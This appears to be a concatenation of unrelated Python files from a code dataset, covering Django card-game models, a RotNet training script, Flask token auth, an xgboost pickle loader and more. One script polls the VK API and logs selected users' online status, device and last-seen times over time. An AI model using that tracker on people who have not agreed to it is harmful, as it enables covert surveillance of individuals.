SHIELD = 2, _("Tarcza")
SWAP_RND = 3, _("Losowa zamiana kolejności kart")
STOP = 4, _("Zatrzymanie na jedną turę")
DOUBLEACTION = 5, _("Dwukrotne wykonanie się karty")
HEAL = 6, _("Leczenie")
BLOCK = 7, _("Blokowanie następnej karty")
EMPOWER = 8, _("Zwiększenie mocy następnej karty")
SKIP = 9, _("Pomijanie następnej karty")
EMPOWER_DMG = 10, _("Zwiększenie obrażeń następnej karty")
EMPOWER_SHIELD = 11, _("Zwiększenie mocy tarczy następnej karty")
EMPOWER_HEAL = 12, _("Zwiększenie mocy leczenia następnej karty")
TRUE_DMG = 13, _("Obrażenia nieuchronne")
id = models.IntegerField(primary_key=True, choices=EffectId.choices, default=EffectId.DMG)
name = models.CharField(max_length=50, help_text="A pretty effect name on-display.")
tooltip = models.TextField(max_length=60, null=True, help_text="Effect description")
has_modifier = models.BooleanField(default=False, help_text="# This field tells us whether a specific effect can "
"have modifiers (power, range, etc). Most of the "
"effect have no such modifiers, so I set the default "
"to be False.")
icon = models.FileField(null=True,
blank=True,
help_text="# Holds an image representing the effect",
upload_to='cards.ImageStorage/bytes/filename/mimetype')
def __str__(self):
return f"{self.name}"
def save(self, *args, **kwargs):
if not isinstance(self.id, CardEffect.EffectId):
self.effect = CardEffect.EffectId(self.id)
self.name = self.effect.label
super(CardEffect, self).save(*args, **kwargs)
def base_card_info_factory(upload_images_to: str):
"""
This function should be used when you need to derive from abstract BaseCardInfo model class.
Creates abstract model class of card info with provided place to store images.
Depending on concrete class that you are creating you may want to store images in different places.
:param upload_images_to: Place to store card info's images.
:return: Abstract BaseCardInfo model class.
"""
class BaseCardInfo(models.Model):
"""
Stores generic information about card (name, tooltip, etc ...).
"""
class Meta:
abstract = True
from cards.validators import validate_file_size
name = models.CharField(max_length=36, help_text="Displayed card's name.")
tooltip = models.TextField(help_text="Card's description. Gets displayed together with the card as a tooltip.",
max_length=80)
image = models.FileField(upload_to='cards.ImageStorage/bytes/filename/mimetype', null=True, blank=True,
help_text="An image. We don't really"
"know what should that be.",
validators=[validate_file_size])
subject = models.CharField(max_length=60, null=True,
help_text="Subject name. In the future this field will be an"
" id pointing to Subject object.")
def save(self, *args, **kwargs):
delete_file_if_needed(self, 'image')
super(BaseCardInfo, self).save(*args, **kwargs)
def delete(self, *args, **kwargs):
super(BaseCardInfo, self).delete(*args, **kwargs)
delete_file(self, 'image')
return BaseCardInfo
class CardInfo(base_card_info_factory('cards/images/')):
"""
Stores generic information about Card.
See: BaseCardInfo which is inner class in base_card_info_factory function.
"""
class Meta:
constraints = [
models.UniqueConstraint(fields=['name'], name='unique_CardInfo_name')
]
def __str__(self):
return f"Card Info < id:{self.id} name:{self.name} >"
def base_card_factory(related_card_info_class: type):
"""
This function should be used when you need to derive from abstract BaseCard model class.
Creates abstract model class of card with provided related card info class.
Depending on concrete card model class that you are creating you may want to reference different
card info model classes.
:param related_card_info_class: Card info class that this BaseCard class will be related to.
:return: Abstract BaseCard model class related to given card info class.
"""
class BaseCard(models.Model):
"""
This may be understood as coupling card's basic info (like name, tooltip) with appropriate levels,
that is, if we create a card's info model, we create multiple cards depending on how many levels the card
may have.
"""
info = models.ForeignKey(related_card_info_class, related_name='levels', unique=False, on_delete=models.CASCADE)
effects_description = models.CharField(max_length=500, help_text="A brief description of this level's effects.",
null=True, default="description")
level = models.ForeignKey(CardLevel, unique=False, on_delete=models.CASCADE)
next_level_cost = models.IntegerField(null=True, validators=[MinValueValidator(0),
MaxValueValidator(100)], blank=True)
class Meta:
abstract = True
"""
This makes (info, level) unique
"""
constraints = [
models.UniqueConstraint(fields=['info', 'level'],
name=f'unique_{related_card_info_class.__name__}_level')
]
return BaseCard
class Card(base_card_factory(CardInfo)):
"""
This may be understood as coupling CardInfo with appropriate levels,
that is, if we create a CardInfo model, we create multiple Cards depending on how many levels the Card may have.
See: BaseCard which is inner class in base_card_factory function.
"""
def __str__(self):
return f"Card < id:{self.id} level:{self.level} info:{self.info.id} >"
pass
def base_card_level_effects_factory(foreignkey_card_cls: type):
"""
This function should be used when you need to derive from abstract BaseCardLevelEffects model class.
Creates abstract base class of card-level effects model with ForeignKey field referencing given card class.
Card-level effects model couples concrete card with its effects.
:param foreignkey_card_cls: Card class that will be referenced by ForeignKey.
:return: Abstract BaseCardLevelEffects model class coupling instances of given card model class with it's effects.
"""
class BaseCardLevelEffects(models.Model):
"""
This is like an extended many-to-many relation in databases.
Couples card objects with its effects.
"""
class Meta:
abstract = True
class Target(models.IntegerChoices):
"""
Possible targets.
"""
PLAYER = 1, _("gracz")
OPPONENT = 2 ,_("przeciwnik")
card = models.ForeignKey(foreignkey_card_cls, related_name='effects', unique=False, on_delete=models.CASCADE)
card_effect = models.ForeignKey(CardEffect, unique=False, on_delete=models.CASCADE)
# This isn't unique even as a pair with card, as a single card on a given level '
# may have multiple of the same effect.
target = models.IntegerField(choices=Target.choices, default=Target.OPPONENT)
power = models.IntegerField(null=True, validators=[MinValueValidator(0),
MaxValueValidator(100)])
# Range defines how the power attribute will vary in card logic.
# So an actual power will be randomized from range (power - range, power + range)
range = models.FloatField(null=True, validators=[MinValueValidator(0),
MaxValueValidator(100)])
return BaseCardLevelEffects
class CardLevelEffects(base_card_level_effects_factory(Card)):
"""
This is like an extended many-to-many relation in databases.
Couples Card objects with its effects.
See: BaseCardLevelEffects which is inner class in base_card_level_effects_factory function.
"""
def __str__(self):
return f"CardLevelEffects < Card: {self.card.id} Effect: {self.card_effect} >"
pass
class ImageStorage(models.Model):
bytes = models.BinaryField()
filename = models.CharField(max_length=255)
mimetype = models.CharField(max_length=50)
|
StarcoderdataPython
|
6568637
|
<gh_stars>0
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torchvision
from torchvision import datasets, transforms
import torch.nn.functional as F
import torch.optim as optim
import models as mdl
import numpy as np
import argparse
import pickle
import os
import datetime
import time
import math
import shutil
def get_parser():
parser = argparse.ArgumentParser(description='Scalable Compression')
parser.add_argument('--batch_size', type=int, default=128,
help='input batch size for training (default: 128)')
parser.add_argument('--epochs', type=int, default=1,
help='number of epochs to train (default: 1)')
parser.add_argument('--lr', type=float, default=0.1,
help='learning rate (default: 0.1)')
parser.add_argument('--device', type=str, default='cuda',
help='Device to be used (acceptable values: cuda, cpu) (default: cuda)')
parser.add_argument('--milestones', nargs="+", type=int, default=[30,60,80],
help='Milestones for learning rate decay (default: [30, 60, 80])')
# not sure if I need
parser.add_argument('--model', type=str, default='rotnet',
help='model choise (acceptable values: rotnet, supervised, rot-nonlinear, rot-conv ) (default: rotnet)')
parser.add_argument('--nins', type=int, default=4,
help='number of nin blocks to comprise the model (default: 4)')
# not sure if I need
parser.add_argument('--layer', type=int, default=2,
help='rotnet layer to take features from to use for classifier (default: 2)')
parser.add_argument('--opt', type=str, default='sgd',
help='Optimizer to be used (acceptable values: sgd, adam) (default: sgd)')
parser.add_argument('--momentum', type=float, default=0.9,
help='Momentum for optimizer (default: 0.1)')
parser.add_argument('--weight_decay', default=5e-4, type=float)
parser.add_argument('--print_after_batches', type=int, default=100,
help='Print training progress every print_after_batches batches (default: 2)')
parser.add_argument('--results_dir', default='results/', type=str)
parser.add_argument('--suffix', default='', type=str,
help="When I need to custom name the final results folder, must begin with _")
parser.add_argument('--epochs_to_save', nargs="+", type=int, default=[100],
help='List of epochs to save (default: [100])')
return parser
def rotate(data, device):
transform = transforms.Compose([transforms.Normalize((125.3/255, 123.0/255, 113.9/255), (63.0/255, 62.1/255, 66.7/255)),])
data.to(device)
transformed = []
rotation = []
for image in data:
transformed.append(transform(image))
rotation.append(0)
pic = torch.transpose(image,1,2)
pic = torch.flip(pic,[2])
transformed.append(transform(pic))
rotation.append(1)
pic = torch.flip(image,[1])
pic = torch.flip(pic,[2])
transformed.append(transform(pic))
rotation.append(2)
pic = torch.flip(image,[2])
pic = torch.transpose(pic,1,2)
transformed.append(transform(pic))
rotation.append(3)
rot = torch.LongTensor(rotation)
return (torch.stack(transformed), rot)
def train(args, network, train_loader, optimizer, mult, scheduler, epoch):
network.train()
total_images_till_now = 0
total_images = len(train_loader.dataset)*mult
for batch_idx, (data, target) in enumerate(train_loader):
data, target = rotate(data, args.device)
data = data.to(args.device)
target = target.to(args.device)
optimizer.zero_grad()
output, _, _ = network(data)
loss = F.cross_entropy(output, target)
loss.backward()
optimizer.step()
total_images_till_now = total_images_till_now + len(data)
if batch_idx % args.print_after_batches == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch+1, total_images_till_now, total_images,
100. * total_images_till_now/total_images, loss.item()))
scheduler.step()
return
def test(args, network, test_loader, mult, datatype):
network.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
data, target = rotate(data, args.device)
data = data.to(args.device)
target = target.to(args.device)
output, _, _ = network(data)
test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss
pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).cpu().sum()
total_images = len(test_loader.dataset)*mult
test_loss /= total_images
test_acc = 100. * correct / total_images
print('\n{} set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
datatype, test_loss, correct, total_images, test_acc))
return test_loss, test_acc
def main(args):
# hard coded values
in_channels = 3 # rgb channels of input image
out_classes = 4 # number of rotations
lr_decay_rate = 0.2 # lr is multiplied by decay rate after a milestone epoch is reached
mult = 4 # data become mult times
####################
train_transform = transforms.Compose([transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor()])
test_transform = transforms.ToTensor()
trainset = datasets.CIFAR10(root='results/', train=True, download=True, transform=train_transform)
testset = datasets.CIFAR10(root='results/', train=False, download=True, transform=test_transform)
train_loader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=0)
test_loader = torch.utils.data.DataLoader(testset, batch_size=args.batch_size, shuffle=False, num_workers=0)
network = mdl.RotNet(in_channels=in_channels, num_nin_blocks=args.nins, out_classes=out_classes).to(args.device)
if args.opt == 'adam':
optimizer = optim.Adam(network.parameters(), lr=args.lr, weight_decay=args.weight_decay)
else:
optimizer = optim.SGD(network.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=args.milestones, gamma=lr_decay_rate)
####################################### Saving information
results_dict = {}
# These will store the values for best test accuracy model
results_dict['train_loss'] = -1
results_dict['train_acc'] = -1
results_dict['test_loss'] = -1
results_dict['test_acc'] = -1
results_dict['best_acc_epoch'] = -1
# For storing training history
results_dict['train_loss_hist'] = []
results_dict['train_acc_hist'] = []
results_dict['test_loss_hist'] = []
results_dict['test_acc_hist'] = []
# directories to save models
checkpoint_path = os.path.join(args.results_dir, 'model.pth')
checkpoint_path_best_acc = os.path.join(args.results_dir, 'model_best_acc.pth')
test_acc_max = -math.inf
loop_start_time = time.time()
checkpoint = {}
for epoch in range(args.epochs):
train(args, network, train_loader, optimizer, mult, scheduler, epoch)
train_loss, train_acc = test(args, network, train_loader, mult, 'Train')
results_dict['train_loss_hist'].append(train_loss)
results_dict['train_acc_hist'].append(train_acc)
test_loss, test_acc = test(args, network, test_loader, mult, 'Test')
results_dict['test_loss_hist'].append(test_loss)
results_dict['test_acc_hist'].append(test_acc)
print('Epoch {} finished --------------------------------------------------------------------------', epoch+1)
checkpoint = {'model_state_dict': network.state_dict(),
'optimizer_state_dict': optimizer.state_dict(),
'epoch':epoch+1,
'train_loss':train_loss,
'train_acc':train_acc,
'test_loss':test_loss,
'test_acc':test_acc}
if test_acc > test_acc_max:
test_acc_max = test_acc
if os.path.isfile(checkpoint_path_best_acc):
os.remove(checkpoint_path_best_acc)
torch.save(checkpoint, checkpoint_path_best_acc)
results_dict['best_acc_epoch'] = epoch+1
results_dict['train_loss'] = train_loss
results_dict['train_acc'] = train_acc
results_dict['test_loss'] = test_loss
results_dict['test_acc'] = test_acc
if epoch+1 in args.epochs_to_save:
torch.save(checkpoint, os.path.join(args.results_dir, 'model_epoch_'+str(epoch+1)+'.pth'))
torch.save(checkpoint, checkpoint_path)
print('Total time for training loop = ', time.time()-loop_start_time)
return results_dict
# Starting the program execution from here
if __name__ == '__main__':
start_time = time.time()
parser = get_parser()
args = parser.parse_args()
args.results_dir = os.path.join(args.results_dir, 'rotnet_'+str(args.nins)+'_ninblocks'+args.suffix)
assert (not os.path.exists(args.results_dir))
if not os.path.exists(args.results_dir):
os.makedirs(args.results_dir)
results_file = os.path.join(args.results_dir, 'results_dict.pickle')
print('--------------------------------------------------------')
print('--------------------------------------------------------')
print('Experiment starting at ', datetime.datetime.now())
print(' ')
options = vars(args)
keys = options.keys()
for key in keys:
print(key, ': ', options[key])
print(' ')
print('--------------------------------------------------------')
print('--------------------------------------------------------')
print(' ')
print(' ')
results_dict = main(args)
# saving the configuration
for key in keys:
new_key = 'config_' + key
results_dict[new_key] = options[key]
with open(results_file, 'wb') as f:
pickle.dump(results_dict, f)
print('--------------------------------------------------------')
print('--------------------------------------------------------')
print('Total time for experiment: ', time.time()-start_time, ' seconds')
print('--------------------------------------------------------')
print('--------------------------------------------------------')
|
StarcoderdataPython
|
5186581
|
<filename>wagtail/wagtailcore/views.py
from django.http import Http404
def serve(request, path):
# we need a valid Site object corresponding to this request (set in wagtail.wagtailcore.middleware.SiteMiddleware)
# in order to proceed
if not request.site:
raise Http404
path_components = [component for component in path.split('/') if component]
return request.site.root_page.specific.route(request, path_components)
|
StarcoderdataPython
|
1804405
|
<reponame>ohsu-comp-bio/ccc_client<gh_stars>0
import argparse
from ccc_client.app_repo.AppRepoRunner import AppRepoRunner
from ccc_client.utils import print_API_response
def run(args):
runner = AppRepoRunner(args.host, args.port, args.authToken)
r = runner.update_metadata(args.imageId, args.metadata)
print_API_response(r)
parser = argparse.ArgumentParser()
parser.set_defaults(runner=run)
parser.add_argument(
"--metadata", "-m",
type=str,
required=True,
help="tool metadata"
)
parser.add_argument(
"--imageId", "-i",
type=str,
help="docker image id"
)
|
StarcoderdataPython
|
11267489
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# main.py
# (c) <NAME> 2018
# <EMAIL>
from requests_html import HTMLSession
import sys
import time
import os
import configparser
config_name = "Settings"
vkapiuri_tag = "VKAPIURI"
accesstoken_tag = "ACCESSTOKEN"
version_tag = "VKAPIVERSION"
def check_user(ids):
TAG = "user checker"
user_ids = ",".join(str(e) for e in ids)
get_link = vk_api_link + "users.get?user_ids=" + str(user_ids) + "&fields=sex,online,last_seen&access_token=" + \
access_token + "&v=" + v + "&lang=ru"
ms = int(round(time.time() * 1000))
content = HTMLSession().get(get_link)
json = content.json()
countMillis = int(round(time.time() * 1000)) - ms
sex = [["была в сети", "был в сети"], ["в сети", "в сети"]]
device = ["с мобильного", "с iPhone", "с iPad", "с Android", "с Windows Phone", "с Windows 10", "с ПК", "с VK Mobile"]
log("br", "")
title_mes = ""
user_online = 0
for i in range(num_of_user):
userinfo = json["response"][i]
userstat = userinfo["last_seen"]
nameofuser = userinfo["first_name"] + " " + userinfo["last_name"]
ms_time = time.gmtime(int(userstat["time"]) + 10800)
log("online", nameofuser + " " + sex[int(userinfo["online"])][int(userinfo["sex"]) - 1] +
" " + device[int(userstat["platform"])-1] + ", " + time.strftime("%d %b %Y %H:%M:%S", ms_time))
if int(userinfo["online"]):
user_online += 1
if len(users) > 1:
title_mes = str(num_of_user) + " наблюдаемых / " + str(user_online) + " в сети"
else:
title_mes = nameofuser + " " + sex[int(userinfo["online"])][int(userinfo["sex"]) - 1] + \
" " + device[int(userstat["platform"])-1] + ", " + time.strftime("%H:%M:%S", ms_time)
log("br", "")
title_ch(title_mes)
log(TAG, "Задержка " + str(countMillis) + " мс.")
def title_ch(title_string):
from os import system
system("title " + title_string)
def log(tag, message):
now = time.localtime()
log_to_file = open(path + str(now.tm_mday) + ".log", "a")
nowtime = time.strftime("%d %b %Y %H:%M:%S", now)
if str(tag) == "i":
text_return = "\n" + str(nowtime) + ": " + str(message) + "\n"
elif str(tag) == "br":
text_return = ""
else:
text_return = str(nowtime) + ": " + str(tag) + ": " + str(message)
print(text_return)
log_to_file.write(text_return + "\n")
log_to_file.close()
def createConfig(path):
config = configparser.ConfigParser()
config.add_section(config_name)
config.set(config_name, vkapiuri_tag, "https://api.vk.com/method/")
config.set(config_name, accesstoken_tag, "<KEY>")
config.set(config_name, version_tag, "5.80")
with open(path, "w") as config_file:
config.write(config_file)
def readConfig(path, param):
if not os.path.exists(path):
createConfig(path)
config = configparser.ConfigParser()
config.read(path)
return config.get(config_name, param)
if __name__ == "__main__":
TAG = "main"
startup = time.time()
runtimes = 0
print("\n\tVKOC ver.1.1\t")
vk_api_link = str(readConfig("./config.ini", vkapiuri_tag))
access_token = str(readConfig("./config.ini", accesstoken_tag))
v = str(readConfig("./config.ini", version_tag))
print("\nИнициализация успешна.\nVK API URI = " + vk_api_link + "\nACCESS TOKEN = " + access_token +
"\nVK API VERSION = " + v + "\n")
num_of_user = 0
users = []
tdelay = 1
if len(sys.argv) >= 2:
users = str(sys.argv[1]).split(",")
num_of_user = len(users)
tdelay = sys.argv[2]
else:
num_of_user = int(input("Колличество отслеживаемых пользователей: "))
users = []
for i in range(num_of_user):
users.append(input("ID пользователя " + str(i + 1) + ": "))
tdelay = input("Введите задержку таймера (мин): ")
users.sort()
timer_delay = tdelay
now = time.localtime()
if now.tm_mon < 10:
month = "0" + str(now.tm_mon)
else:
month = str(now.tm_mon)
path = None
if len(users) > 1:
users_s = "; ".join(str(e) for e in users)
path = "logs/" + "few users/" + users_s + "/" + str(now.tm_year) + month + "/"
else:
path = "logs/" + str(users[0]) + "/" + str(now.tm_year) + month + "/"
if not os.path.exists(path):
os.makedirs(path)
while True:
runtimes += 1
log("br", "")
log(TAG, "### ###")
log(TAG, "Программный цикл: " + str(runtimes))
try:
if users is None and users == "":
break
else:
check_user(users)
timer_delay = tdelay
except Exception as e:
log("error", "Произошла ошибка: " + str(e))
timer_delay = 1
uptime = round(time.time() * 1000) - round(startup * 1000)
log(TAG, "Повтор команды через " + str(timer_delay) + " минут.")
log(TAG, "Uptime: " + str(uptime) + " ms")
time.sleep(60 * float(timer_delay))
|
StarcoderdataPython
|
3345617
|
<filename>OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/GL/OES/read_format.py
'''OpenGL extension OES.read_format
This module customises the behaviour of the
OpenGL.raw.GL.OES.read_format to provide a more
Python-friendly API
Overview (from the spec)
This extension provides the capability to query an OpenGL
implementation for a preferred type and format combination
for use with reading the color buffer with the ReadPixels
command. The purpose is to enable embedded implementations
to support a greatly reduced set of type/format combinations
and provide a mechanism for applications to determine which
implementation-specific combination is supported.
The preferred type and format combination returned may depend
on the read surface bound to the current GL context.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/OES/read_format.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.OES.read_format import *
from OpenGL.raw.GL.OES.read_format import _EXTENSION_NAME
def glInitReadFormatOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
|
StarcoderdataPython
|
3476255
|
<filename>eslearn/utils/multiprocessing_test.py
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 4 22:41:05 2018
@author: lenovo
"""
from concurrent.futures import ThreadPoolExecutor
import time
# 参数times用来模拟网络请求的时间
def get_html(times):
time.sleep(times)
print("get page {}s finished\n".format(times))
return times
with ThreadPoolExecutor(2) as executor:
#executor = ThreadPoolExecutor(max_workers=2)
# 通过submit函数提交执行的函数到线程池中,submit函数立即返回,不阻塞
task1 = executor.submit(get_html, (0.5))
task2 = executor.submit(get_html, (0.5))
|
StarcoderdataPython
|
3496819
|
<gh_stars>1-10
# Always prefer setuptools over distutils
from setuptools import setup
setup(
name="mattermostwrapper",
packages=['mattermostwrapper'],
version="2.2",
author="<NAME>",
author_email="<EMAIL>",
url='https://github.com/btotharye/mattermostwrapper.git',
download_url='https://github.com/btotharye/mattermostwrapper/archive/2.2.tar.gz',
description=("A mattermost api v4 wrapper to interact with api"),
license="MIT",
install_requires=[
'requests',
],
classifiers=[],
)
|
StarcoderdataPython
|
1707353
|
<gh_stars>10-100
import unittest
from policytool import policyutil
class TestValidatePolicy(unittest.TestCase):
def test_validate_policy_with_ok_input(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"policyType": 0,
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
},
"policyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
policyutil.validate_policy(policy)
def test_validate_policy_with_deny_policy_items(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"policyType": 0,
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
},
"denyPolicyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
policyutil.validate_policy(policy)
def test_validate_policy_with_missing_name(self):
policy = {
"service": "service_tag",
"policyType": 0,
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
},
"policyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
with self.assertRaises(AttributeError):
policyutil.validate_policy(policy)
self.fail("Validate policy did not raise exception for missing name.")
def test_validate_policy_with_missing_policytype(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
},
"policyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
with self.assertRaises(AttributeError):
policyutil.validate_policy(policy)
self.fail("Validate policy did not raise exception for missing policyType.")
def test_validate_policy_with_missing_resources(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"policyType": 0,
"description": "Test rule",
"policyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
with self.assertRaises(AttributeError):
policyutil.validate_policy(policy)
self.fail("Validate policy did not raise exception for missing resources.")
def test_validate_policy_with_missing_policyitems_and_policytype_0(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"policyType": 0,
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
}
}
with self.assertRaises(AttributeError):
policyutil.validate_policy(policy)
self.fail("Validate policy did not raise exception for missing policyItems.")
def test_validate_policy_with_missing_policyitems_and_policytype_not_0(self):
policy = {
"service": "service_tag",
"name": "test_policy_rule",
"policyType": 1,
"description": "Test rule",
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
}
}
policyutil.validate_policy(policy)
class TestResourceType(unittest.TestCase):
def test_get_resource_type_for_tag(self):
policy = {
"policyType": 0,
"resources": {
"tag": {
"values": [
"visible"
],
"isExcludes": False,
"isRecursive": True
}
}
}
self.assertEqual("tag", policyutil.get_resource_type(policy))
def test_get_resource_type_for_database(self):
policy = {
"policyType": 0,
"resources": {
"database": {
"values": [
"my_db"
]
},
"column": {
"values": [
"*"
]
},
"table": {
"values": [
"*"
]
}
}
}
self.assertEqual("database", policyutil.get_resource_type(policy))
def test_get_resource_type_for_path(self):
policy = {
"policyType": 0,
"resources": {
"path": {
"values": [
"/my/path"
]
}
},
}
self.assertEqual("path", policyutil.get_resource_type(policy))
def test_get_resource_type_when_not_found_must_return_unknown(self):
policy = {
"policyType": 0,
"resources": {}
}
self.assertEqual("unknown", policyutil.get_resource_type(policy))
def test_get_resource_type_when_not_providing_policytype_0_must_fail(self):
policy = {
"name": "foo",
"policyType": 1,
"resources": {
"path": {
"values": [
"/my/path"
]
}
},
}
with self.assertRaises(AttributeError) as e:
policyutil.get_resource_type(policy)
self.fail("get_resource_type did not raise exception for missing policyItems.")
self.assertEqual(
"PolicyType must be 0 to support option expandHiveResourceToHdfs. Policy: foo",
e.exception.message)
class TestExtendTagPolicyWithHdfs(unittest.TestCase):
def test_read_only_access(self):
policy_input = {
"policyType": 0,
"resources": {
"tag": {}
},
"policyItems": [{
"accesses": [{
"type": "hive:select",
"isAllowed": True
}, {
"type": "hive:read",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
policy_expected = {
"policyItems": [{
"accesses": [{
"isAllowed": True,
"type": "hive:select"
}, {
"isAllowed": True,
"type": "hive:read"
}, {
"isAllowed": True,
"type": "hdfs:read"
}, {
"isAllowed": True,
"type": "hdfs:execute"
}],
"delegateAdmin": False,
"users": ["myuser"]
}],
"policyType": 0,
"resources": {
"tag": {}
}
}
self.assertEqual(policy_expected, policyutil.extend_tag_policy_with_hdfs(policy_input))
def test_write_access(self):
policy_input = {
"policyType": 0,
"resources": {
"tag": {}
},
"policyItems": [{
"accesses": [{
"type": "hive:insert",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
policy_expected = {
"policyItems": [{
"accesses": [{
"isAllowed": True,
"type": "hive:insert"
}, {
"isAllowed": True,
"type": "hdfs:write"
}],
"delegateAdmin": False,
"users": ["myuser"]
}],
"policyType": 0,
"resources": {
"tag": {}
}
}
self.assertEqual(policy_expected, policyutil.extend_tag_policy_with_hdfs(policy_input))
def test_deny_write_access(self):
policy_input = {
"policyType": 0,
"resources": {
"tag": {}
},
"denyPolicyItems": [{
"accesses": [{
"type": "hive:insert",
"isAllowed": True
}],
"users": ["myuser"],
"delegateAdmin": False
}]
}
policy_expected = {
"denyPolicyItems": [{
"accesses": [{
"isAllowed": True,
"type": "hive:insert"
}, {
"isAllowed": True,
"type": "hdfs:write"
}],
"delegateAdmin": False,
"users": ["myuser"]
}],
"policyType": 0,
"resources": {
"tag": {}
}
}
self.assertEqual(policy_expected, policyutil.extend_tag_policy_with_hdfs(policy_input))
|
StarcoderdataPython
|
6403399
|
from .. import auth, models
from flask import Blueprint, g, make_response, render_template
import json
login_auth = Blueprint('login_auth', __name__)
# This blueprint handles RESTful API authentication and token generation.
@auth.error_handler
def unauthorized():
return make_response("""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n""", 404)
@auth.verify_password
def verify_password(username_or_token, password):
"Verifies credientials."
# first try to authenticate by token
user = models.User.verify_auth_token(username_or_token)
if not user:
# try to authenticate with username/password
user = models.User.query.filter_by(username=username_or_token).first()
if not user or not user.verify_password(password):
return False
g.user = user
return True
@login_auth.route('/get-auth-token')
@auth.login_required
def get_auth_token():
"""
Generates an authentication token for 600 seconds.
:returns: json
"""
token = g.user.generate_auth_token(600)
return json.dumps({'token': token.decode('ascii'), 'duration': 600})
@login_auth.route('/resource')
@auth.login_required
def get_resource():
return json.dumps({'data': 'Hello, %s!' % g.user.username}), 200
@login_auth.route('/sample')
def get_sample():
return json.dumps(dict(msg='Hello'))
|
StarcoderdataPython
|
3422575
|
# -*- encoding: utf-8 -*-
"""
:copyright: 2017-2020 H2O.ai, Inc.
:license: Apache License Version 2.0 (see LICENSE for details)
"""
def load_pkl(name):
"""Load xgboost model from pickle and perform conversion from version
0.90 if necessary.
:return:
XGBoost model
"""
import pickle
import xgboost
with open(name, 'rb') as f:
try:
model = pickle.load(f)
return model
except xgboost.core.XGBoostError as e:
if "Check failed: header == serialisation_header_" in str(e):
import xgboost_prev # pylint: disable=unused-import
import tempfile
class Unpickler(pickle.Unpickler):
def find_class(self, module, name):
if module.startswith("xgboost"):
return pickle.Unpickler.find_class(
self, module.replace(
"xgboost", "xgboost_prev"),
name)
return pickle.Unpickler.find_class(self, module, name)
f.seek(0)
model = Unpickler(f).load()
temp_file = tempfile.NamedTemporaryFile(
prefix='xgboost_migration', suffix='.model')
model.save_model(temp_file.name)
migrated_model = xgboost.XGBModel()
migrated_model.load_model(temp_file.name)
return migrated_model
raise
|
StarcoderdataPython
|
6668214
|
<reponame>fortminors/msai-python
from django import forms
class LeadForm(forms.Form):
name = forms.CharField(label='Your name', max_length=100)
email = forms.EmailField(label='Email', max_length=100)
|
StarcoderdataPython
|
3424194
|
# Copyright 2020 LMNT, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Layer Normalized Independently Recurrent Neural Network"""
import pkg_resources
import tensorflow as tf
from tensorflow.compat import v1
from tensorflow.compat.v1.nn import rnn_cell
from .base_rnn import BaseRNN
from .weight_config import WeightConfig
__all__ = [
'LayerNormIndRNN'
]
LIB = tf.load_op_library(pkg_resources.resource_filename(__name__, 'libhaste_tf.so'))
@tf.RegisterGradient("HasteLayerNormIndrnn")
